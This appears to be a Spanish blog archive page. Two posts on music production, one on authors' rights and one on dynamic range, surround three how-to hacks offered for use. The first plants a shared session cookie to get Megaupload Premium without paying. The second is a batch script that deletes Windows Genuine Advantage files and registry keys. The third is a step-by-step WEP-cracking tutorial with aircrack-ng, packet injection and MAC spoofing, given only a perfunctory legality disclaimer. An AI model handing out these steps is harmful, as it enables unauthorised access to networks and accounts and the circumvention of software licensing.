Este artículo proviene del audioblog, clausurado por su desuso y cuyas entradas
han sido movidas a este blog para que no se pierdan en el olvido.
Entrada escrita originalmente por TDF.
Derechos sobre nuestras obras
La mayoría de productores cuando hacemos un tema no nos preocupamos mucho sobre los derechos que tenemos sobre este. Lo pasamos, lo enviamos a discográficas e incluso se sacan discos sin ningún tipo de contrato ni conocimiento de cómo y quien puede usarlos. Es importante registrar la obra de alguna manera, ya sea en copyright o copyleft, ya que si, por ejemplo, cuelgas un tema en Internet que no está registrado de ninguna manera, y de repente te la encuentras en un anuncio publicitario, tendrías que empezar una batalla legal que no garantizaría nada, algo poco probable, pero no imposible.
Eso en un principio no es problema, quieres darte a conocer y sacar un disco, por lo que aceptas las condiciones que te pone la discográfica, y en las pequeñas discográficas indie una de ellas no es tener las obras registradas, y menos que estés inscrito en una sociedad de gestión, ya que así ahorran en costes.
Pero llegados al punto en que tengas un buen número de trabajos editados y de conciertos (o sesiones) creo que tienes la oblación de conocer tus derechos como autor. Por lo tanto, voy a explicar un poco los derechos como autor/compositor de nuestras obras. Solo hablo de autor o compositor porqué en la música electrónica (que es de lo que trata este blog) generalmente, no hay ni intérpretes, ni arreglistas, ni muchos otros que si que están en otros estilos.
Los derechos persisten 70 años después del fallecimiento del último autor de la obra, después de este tiempo pasan a ser de dominio público.
Hay dos grandes grupos de derechos, los morales y los de explotación.
Empezamos por los derechos morales, estos nunca se pueden ceder, vender, ni traspasar. El autor, por el simple hecho de crear una obra, adquiere estos derechos. Los derechos morales son:
Derecho a la divulgación
Derecho al respeto del nombre del autor
Derecho al respeto de la obra
Básicamente estos permiten que el autor decida cómo, cuándo, y dónde se explota su obra.
Si usaras tu nombre, un seudónimo, o lo harás anónimamente.
Si quieres que esta se divulgue, porqué nadie puede obligarte a distribuir una obra, aunque haya un contrato (teóricamente…)
Exigir que te reconozcan como autor.
Defender tu obra contra manipulaciones y alteraciones que no crees oportunas. Por ejemplo, si se hace un remix que consideras mediocre, puedes negarte a que este sea divulgado, aunque dieras previa autorización y haya contratos por medio.
Retirar la obra de las tiendas por un cambio de tus creencias. Por ejemplo, si tienes un grupo de OI! y al día siguiente te haces cristiano, puedes pedir la retirada de tu obra de todas las tiendas, aunque haya contratos de por medio (una vez más).
Acceder a una copia rara o única de tu obra. Si un día en una discoteca haces un live que nunca has repetido y alguien lo ha grabado, este tiene la obligación de pasarte esa grabación para que tú la distribuyas como quieras.
Los derechos de explotación también se adquieren al crear una obra, pero a diferencia de los morales, estos si que se pueden vender. Estos derechos se refieren principalmente a una remuneración económica, los explicaré a grandes rasgos porque cada uno es un mundo de contratos, porcentajes y demás historias.
Reproducción: Es el derecho que tienes a cobrar un porcentaje por el hecho de que tu obra sea grabada en un cd, vinilo, cassette… Normalmente el autor se lleva 600€ por cada 1000 copias hechas.
Distribución: El porcentaje que te llevarías de las ventas en tiendas de tu obra.
Comunicación pública: Cuando tus obras son divulgadas públicamente, ya sea en un anuncio, en un bar, o (teóricamente) en una discoteca, estos tienen la oblación (una vez mas, teóricamente) de hacer una lista con los temas que han sonado, pagar a la SGAE, y esta te pagaría el porcentaje que te tocara. Como apunte curioso, “paquito el chocolatero” es el tema que más derechos de autor genera en España.
Transformación: Seria el porcentaje que te llevarías de una obra hecha a partir de la tuya, o en el hipotético caso, de una traducción de la letra.
Estos derechos se conocen como Copyright, tu puedes elegir si se distribuye en copyright, o copyleft (Creative commons). El copyleft solo utiliza los derechos morales, por lo tanto una obra en copyleft nunca generará derechos de explotación.
Los derechos de explotación generalmente se comparten con la discográfica, y un contrato abusivo se refiere a que la discografica pide en el contrato más de un 50% de alguno o todos de estos derechos. Por eso hay que andar con mucho ojo a la hora de firmar contratos, ya que la SGAE no te gestionara una obra de la que no dispongas más del 50% de todos estos derechos.
El cobro de estos derechos se hace a través de una entidad gestora, que para el caso de los autores es la SGAE. El trabajo de esta consiste en recopilar todos los beneficios que ha producido tu obra en concepto de derechos de explotación y darte el porcentaje que te toca. La SGAE solo trabaja con temas registrados en Copyright, pero tú, como autor, puedes tener algunos trabajos en copyleft y otros en copyright.
Evidentemente esto es para contratos con discográficas medianas, una discográfica pequeña seguramente no te pedirá ni contrato ni que estés inscrito en la SGAE, porque hacen tiradas pequeñas. Tenéis que valorar cuándo es mejor no firmar nada y sacar un disco para promocionaros, y cuándo podéis empezar a exigir contratos y derechos de explotación.
Una de las maneras para hacernos con una cuenta Premium de Megaupload, **totalmente gratis. **Es utilizando el navegador Firefox y un editor de cookies. Explicaremos, paso por paso, que se de hacer para ello.
Nos bajaremos e instalaremos el correspondiente addons para Firefox:Aquí
Entras en: htt://www.megaupload.com
Borras las cookies
OSX/ LINUX: Firefox/Preferencias/Privacidad/Mostrar Cookies/Remove todas las cookies
Win: Herramientas/Limpiar Información privada y seleccionamos solo la opción cookies.
Abrimos el editor de coockies:Herramientas\ Cookies Editor y creamos una nueva clickando a Add, rellándola con los siguientes datos:
Name: user
Content: 5ac02848c2a0260e2d67fe773da61493
Host: .megaupload.com
Path: /
Luego le damos a New expiration date y salvamos.
Seleccionas Options y le das a la opción save and close.
Cerramos editor.
Y nada más. A disfrutar que ya tenemos una cuenta Premium de megaupload.
Es posible que algún dia no podaís acceder a dicho servicio, debido a que tendreís que buscar un nuevo Content. Como se dice por los foros Search de info.
Si todavía no sufres este mensaje y lo que buscas es la manera de evitarlo,
pulsa aquí
La manera de quitar el aviso: “Podría ser una víctima de falsificación de software. Esta copia de Windows no ha superado el proceso de validación de Windows Original” es tan sencillo como:
Abrimos el bloc de notas y pegamos el siguiente código:
1
2
3
4
5
6
7
8
9
10
taskkill /im wgatray.exe
Del c:WindowsSystem32WgaTray.exe
Del c:WindowsSystem32dllcacheWgaTray.exe
echo Windows Registry Editor Version 5.00 >%temp%WGANFIX.REG
echo. >>%temp%WGANFIX.REG
echo [-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonNotifyWgaLogon] >>%temp%WGANFIX.REG
regedit /s %temp%WGANFIX.REG
del %temp%WGANFIX.REG
del c:windowssystem32wgalogon.dll
del c:windowssystem32dllcachewgalogon.dll
Guardamos el archivo como “loquequieras.bat”. Por ejemplo “quitaraviso.bat”
Ejecutamos el programa que acabamos de crear haciendo dos clics sobre él y reiniciamos el ordenador y el mensaje de aviso de que Windows no es original desaparece.
Hace poco me volví a interesar por este tema y me costó tanto lograrlo (lo hice posible entre 4 o 5 páginas distintas) que he decidido hacer una entrada reuniendo todos los pasos. Antes de continuar debéis tener presente que esto es ilegal en la mayor parte de los países así que si vais a hacer uso de ello** deberá ser sobre VUESTRA red WiFi**. Dicho esto, que seguramente pocos haréis caso alguno, procedamos a ello.
Primeros pasos
El primer paso será averiguar si nuestra tarjeta WiFi permite que la activemos en modo monitor. El modo monitor nos permite hacer un tipo de ataque que reduce considerablemente el tiempo de obtención de las claves (de unos días a unos minutos). No obstante, con cualquier tarjeta podéis obtener claves, el problema es que con una tarjeta sin modo monitor tardaréis días o semanas (o quizás nunca la consigáis).
En este enlace hay un buen listado de tarjetas inalámbricas dónde se nos indica cuáles están preparadas para hacer inyección (modo monitor) y cuáles no.
Si vuestra tarjeta está en esta lista y en la celda de “Inyección” pone “Lx”, ¡premio! Vuestra tarjeta permite la inyección de tráfico.
Yo realizaré las pruebas con una D-link DWL con chipset Atheros (cuesta unos 25€ en cualquier tienda de informática).
Ahora que sabemos que nuestra tarjeta es compatible debemos instalar los drivers “Madwifi” para dicha tarjeta, ya que son los que nos permiten la inyección de tráfico y el uso de la aplicación aircrack-ng (la utilizada para averiguar las claves wifi).
Antes de poder instalar estos drivers necesitáis las herramientas de compilación y las cabeceras necesarias de linux (sin ello la instalación no se completaría). Así que accedemos a una terminal como administrador (tecleando “su” en ella) e instalamos las herramientas mencionadas:
Una vez instaladas las cabeceras procedemos a la instalación de Madwifi. Para ello descarguemos la última versión de la web madwifi-project, actualmente la última versión (y la que estoy utilizando yo) es la siguiente: madwifi-hal-0.10.5.6-r3942-20090205.tar.gz Descargad el fichero en la carpeta /tmp/ (por ejemplo) y acceded a ella mediante consola para descomprimir e instalar el fichero:
1
2
3
4
5
6
7
8
#ACCEDEMOS A LA CARPETA DONDE HEMOS DESCARGADO MADWIFIcd /tmp/
#DESCOMPRIMIMOS MADWIFI
tar -xvvzf madwifi-hal-0.10.5.6-r3942-20090205.tar.gz
#ACCEDEMOS A LA CARPETA GENERADAcd madwifi-hal-0.10.5.6-r3942-20090205
#COMPILAMOS E INSTALAMOS
make && make install
Si estáis reinstalando el driver recordad eliminar el anterior antes de hacer make && make install:
1
rmmod -w ath_pci.ko
Ahora que ya lo tenemos instalado debemos añadir el módulo al kernel de linux:
1
modprobe ath_pci
Y para añadirlo siempre que arranque el sistema, lo añadimos en el fichero modules situado en la carpeta etc:
1
echo ath_pci >> /etc/modules
Éste último comando escribe “ath_pci” al final del fichero modules. Si ya habíais instalado anteriormente Madwifi seguramente no sea necesario este paso (comprobad el contenido del fichero con “cat /etc/modules”).
Instalar aircrack-ng
¡Ya tenemos instalado Madwifi! Lo siguiente que haremos será instalar aircrack-ng:
1
aptitude -y install aircrack-ng
Menuda complicación, ¿eh? :D
Crackeando redes WEP
Antes de continuar a delante quiero recordaros lo que ya he dicho al principio… La mayoría de países no permiten hacer esto, así que si vais a hacerlo debe ser con consentimiento del dueño de la red que vayáis a atacar.
Activar modo monitor
Ahora que ya tenemos todo lo necesario activaremos el modo monitor de nuestra tarjeta para poder hacer inyección de paquetes. Recordad que el último paso que hicimos fue añadir el módulo de la tarjeta al kernel de linux pero no hemos activado nuestra red. Comprobemos las redes que tenemos activas con “ifconfig”. Al hacerlo observaremos que tenemos una red “wifi0” pero esto es un dispositivo virtual y no nos sirve, así que pondremos en marcha el dispositivo ath0:
1
wlanconfig ath0 create wlandev wifi0 wlanmode sta
Si al hacerlo recibís el siguiente error:
1
wlanconfig: ioctl: Invalid argument
Es porque ya tenéis la red ath0 activada, pero para hacerla funcionar correctamente (solo para asegurarnos) haced lo siguiente:
1
2
3
4
#LO DESTRUIMOS
wlanconfig ath0 destroy
#Y LO VOLVEMOS A CREAR EN MODO STANDALONE (wlanmode sta)
wlanconfig ath0 create wlandev wifi0 wlanmode sta
Sé que parece algo estúpido, pero sin hacer esto probablemente no funcionaría correctamente (la primera vez, dado que hemos instalado los nuevos drivers sin destruir la conexión previamente). Bien, ahora deberíais tener vuestra red wifi funcionando con normalidad y debéis poder conectaros a una red si disponéis de la contraseña. Pasemos pues a activar el modo monitor de una vez:
1
2
3
4
#LO DESTRUIMOS
wlanconfig ath0 destroy
#Y LO VOLVEMOS A CREAR EN MODO STANDALONE (wlanmode sta)
wlanconfig ath0 create wlandev wifi0 wlanmode monitor
Ya la tenemos en modo monitor. Ahora aparentemente no funciona el wifi ya que si vamos a explorar redes con el applet de gnome no encuentra nada. Pero si no habéis recibido error alguno es porque está activado y podéis pasar al siguiente paso.
Escanear redes y capturar paquetes
Primero haremos un escaneo sin especificar canal ni nada, simplemente para ver en qué canal se encuentra nuestra red:
1
airodump-ng ath0
La pantalla está dividida en dos partes importantes: la de AP (access points), en la parte superior y la de clientes, en la parte inferior.
Las cosas que más nos interesan son BSSID (MAC del AP), PWR (potencia de la señal), #Data que nos dice el número de paquetes captados (paquetes que luego servirán para averiguar la contraseña, cuantos más paquetes más posibilidades de conseguirla), CH (canal), ENC (tipo de encriptación que para seguir este tutorial debe ser WEP), ESSID (nombre de la red), STATION (usuarios conectados al AP). Mi red es la que tiene como nombre “JAZZTEL_2C” con BSSID 00:1A:23:14:23:3C y, evidentemente, esta es la que voy a atacar, así que empecemos capturando paquetes sólo para esta red (lo que reducirá el tamaño del fichero generado):
En negrita están el canal y la BSSID respectivamente, que deberéis cambiar a partir de los datos obtenidos vosotros de vuestra red. El parámetro –write indica dónde el nombre del fichero en el que se guardarán los datos y “ath0” es nuestra interfaz de red.
Comprobar bloqueo MAC
El siguiente paso será comprobar si el punto de acceso tiene activada la restricción MAC, para hacerlo utilizaremos aireplay-ng (en una nueva terminal, por supuesto):
1
aireplay-ng -1 0 -e JAZZTEL_2C -a 00:1A:23:14:23:3C -h 00:11:22:33:44:55 ath0
El primer parámetro es el tipo de ataque (un número del 0 al 6), en este caso un uno, seguido del número de veces que se va a hacer (0 es la primera posición, así que se repetirá una única vez). El parámetro -e es el nombre de la red, la -a su BSSID y la -h es una MAC inventada (ahí la gracia, saber si nos permite conectarnos con una mac que no exista en su lista negra) y el último parámetro es la interfaz de red que utilizaremos. Si el resultado es…
El filtro MAC está inhabilitado y podéis pasar al paso “Inyección de paquetes (sin bloqueo mac)”, sino saltad a “Inyección de paquetes (con bloqueo mac)”.
Inyección de paquetes (sin bloqueo mac)
Vayamos al terminal donde tenemos airodump-ng funcionando (captando paquetes) y comprobemos si hay algún STATION asociado al BSSID de la red a atacar. Si es así copiad la MAC de la estación y utilizadla en la siguiente orden:
-3 es el tipo de ataque, -b la bssid a atacar, -h la MAC de la STATION y el último parámetro es la interfaz de red. En caso de no disponer de un STATION debéis poner vuestra MAC, para averiguarla podéis mirarlo en vuestra tarjeta de red o bien con el comando:
1
ifconfig ath0 | grep HWaddr
Si os da vuestra dirección separada por guiones recordad ponerla separada por puntos y sólo las 6 primeras parejas de números. Hecho esto veréis como aireplay-ng empieza a enviar paquetes al AP. Puede que pasen unos minutos hasta que los “ARP” empiezan a incrementar, pero llegado ese momento podréis ver como los “#Data” de airodump-ng empiezan a subir rápidamente.
Si estamos atacando utilizando la mac de un STATION en lugar de la nuestra, nos aparecerá este error:
1
2
3
The interface MAC (06:19:5B:C9:F2:4A) doesn't match the specified MAC (-h).
ifconfig ath0 hw ether 00:16:CB:BA:23:D2
Esto es porque la mac que le hemos indicado no coincide con la de nuestra tarjeta de red. Para solucionar esto basta con cambiar la mac por la de la estación que estemos emulando (utilizad control+C para terminar el proceso de aireplay-ng, cambiad la MAC y volved a ejecutar aireplay-ng). Para cambiar la MAC pasad al punto Cambiar dirección MAC de la interfaz de red
Inyección de paquetes (con bloqueo MAC)
La opción más sencilla a la hora de inyectar paquetes en un AP con bloqueo MAC es hacerse pasar por uno de sus clientes. Para poder hacer esto tenemos que cambiar la dirección MAC, no obstante aireplay-ng tiene la posibilidad de atacar AP con bloqueo MAC (con este proceso no es necesario cambiar la MAC):
Es un proceso bastante más lento que sin bloqueo de MAC, pero funciona igualmente. De todos modos si hay alguna estación conectada al AP la mejor opción es que cambiéis vuestra MAC a la de dicha estación.
Cambiar dirección MAC de la interfaz de red
Para ello hay dos maneras de hacerlo, una de ellas nos la indicaba un error de unas líneas más arriba:
1
ifconfig ath0 hw ether 00:16:CB:BA:23:D2
La otra es utilizar macchanger:
1
2
3
4
5
6
7
8
#INSTALAMOS MACCHANGER
aptitude -y install macchanger
#DESACTIVAMOS LA INTERFAZ DE RED ath0
ifconfig ath0 down
#CAMBIAMOS LA MAC
macchanger -m 00:16:CB:BA:23:D2
#REACTIVAMOS LA INTERFAZ DE RED ath0
ifconfig ath0 up
Haciendo esto nos aseguramos que el AP crea que somos uno de sus clientes y facilitará la obtención de paquetes ARP.
Autenticación en el router
En ocasiones puede que se nos presente el siguiente error al ejecutar la inyección de tráfico con aireplay-ng:
1
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Esto es debido a que no nos hemos identificado en el router y se da casi siempre que no hay una estación conectada al AP. Podemos solucionarlo de dos formas:
1
aireplay-ng -1 0 -e JAZZTEL_2C -a 00:1A:23:14:23:3C -h 00:16:CB:BA:23:D2 ath0
Que de ser ejecutado correctamente nos mostrará en pantalla:
1
2
3
4
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Aquí estamos indicando que envíe paquetes cada 6 segundos (en milisegundos) y que sólo los envíe en grupos de uno (-o 1) ya que muchos AP se confunden al mandarles muchos paquetes juntos (que es como actúa por defecto).
Ambas son igualmente eficientes (quizás la primera sea un poco más rápida, pero habrá muchas ocasiones en que no podréis utilizarla). Os recomiendo la segunda, ya que no paramos de autenticarnos en el router y no le damos pie a errores.
Averiguando la clave con aircrack-ng
Cuando el número de #Data esté por encima de 30.000 podemos ir ejecutando aircrack-ng en una nueva terminal cargando el fichero que se va guardando (es decir, no paréis la captura de paquetes con airodump, por si no tuviérais suficientes datos):
1
aircrack-ng jazztel2c-01.cap
Y.. presto! Ya tenemos nuestra clave:
Descarga de ficheros
En caso de que no pudierais utilizar “aptitude” porque la máquina desde la cual queréis hacer los ataques no tiene conexión a internet podéis descargar todos los programas que he ido mencionando desde la página de paquetes de ubuntu:
Espero haberme explicado con suficiente claridad. Me he pasado mucho tiempo intentando organizarlo de la mejor manera posible. Ahora sólo os queda practicar! Con unas cuántas pruebas le pillaréis el tranquillo ;)
Bueno me estreno como bloggeador, a ver que tal se me da ;)
Muchas veces escuchamos temas y nos parecen absolutos temazos y otra veces nos parecen una pérdida de tiempo. En cierta medida es por la música que se escucha. Pero hoy vamos un poco más allá. Ya me atrevo a decir, que parte de que un tema acabe por agradarnos es debido a que existen dos conceptos que últimamente no se tienen muy en encuenta en producción.
Me refiero al Rango Dinámico.
Qué es? Pues no es más que la diferencia entre el pico(peaks) más alto posible y el umbral de ruido, Sí, siempre hay una base de ruido, hasta en el mejor estudio insonorizado. Y esto como afecta a que lo que escuche sea un temazo? Muy fácil, ya que esta variación de amplitud influye en la intensidad sonora, en como fluye el tema, la diferencia en fuertes y débiles. También hay que tener en cuenta la amplitud nominal específica de cada equipo, lo que se denomina el techo dinámico o Headroom. Normalmente se queda en 120Db, ya que es el límite que permiten los circuitos integrados. Lo que nosotros escuchamos de todo esto es el SNR, signal noise ratio, es decir la relación entre el ruido residual y la señal promedio del tema.
Si trasladamos esto a nuestros quehaceres como músicos quiere decir que ninguna frecuencia que estemos usando dentro de nuestro tema debe ser fija, lo que se denomina average, y que demasiada compresión es mala también, ya que puede aplastar el sonido, ya que aplicar un compresor disminuye las diferencias dinámicas. Esto también incluye la mezcla y la normalización (de la que hablaremos más adelante) Donde algunos recursos nos pueden ayudar a lograr que nuestro tema abarque el mayor rango dinámico en todas sus frecuencias. Como por ejemplo: Si se reduce la amplitud dela frecuencias medias, aproximadamente las frecuencias de 250Hz, se consigue potenciar frecuencias de 5KHz.
Otro recurso que a veces fallamos cuando estamos tocando algún sintetizador, ya sea analógico o digital, o cuando estamos realizando la mezcla es el Bit Depth o Resolución/Cuantización de bits .
El Bit Depth es la amplitud de variaciones de una onda de sonido. Traducido al cristiano, el número de bits registrados por sample. Esto afecta al concepto antes explicado, rango dinámico, ya que a mayor profundidad de bits, mayor posibilidad de trabajar con amplios rangos dinámicos, lo que se denomina rule-of-thumb. Ya que por ejemplo, si trabajamos con sintetizadores de 8 bits, que están tan de moda, estamos diciendo que este sintetizador, la onda que envía de salida, solo permite registrar 256 variaciones en la amplitud dela onda. Recordemos que8 bits = 2 a la 8. Con esto no quiero decir que un sintetizador de 8 bits sea malo, cada uno hace su función, pero se encuentran muchos casos donde se le piden peras al olmo, cuando todos sabemos que tienes que ir al peral. Me gustaría hacer hincapié en este concepto sobretodo para los usamos sintetizadores analógicos, cajas ritmos, samplers. Ya que el bit depth dentro de un PCM, la representación digital de un sonido analógico, recrea el máximo rango dinámico, lo que quiere decir que el sonido sera más real.
Volvamos entonces a la pregunta antes formulada. ¿Cómo afecta esto a que mi tema para que suene a bien? Bueno el bit depth limita la cantidad de rango dinámico y signal noise ratio. Lo que hace que si abarcamos una mayor resolución de bits podremos interactuar con más precisión dentro del tema que estemos componiendo y por consiguiente mejorar la señal de salida del conjunto.
Aun así, siento ser así de aguafiestas, el problema del bit depth viene dado a que hoy en día usamos un formato que tiene una compresión muy baja y mala, como el MP3 o WMA. Aunque tu exportes a 24 bits, no quiere decir que el MP3/WMA tenga un bit depth de 24 bits, ya que tu los has masterizado a 24 bits pero luego ha sido comprimido y es donde se falla. Esto también pasa incluso si copiamos directamente a un CD, ya que los CD’s se graban a 16 bits.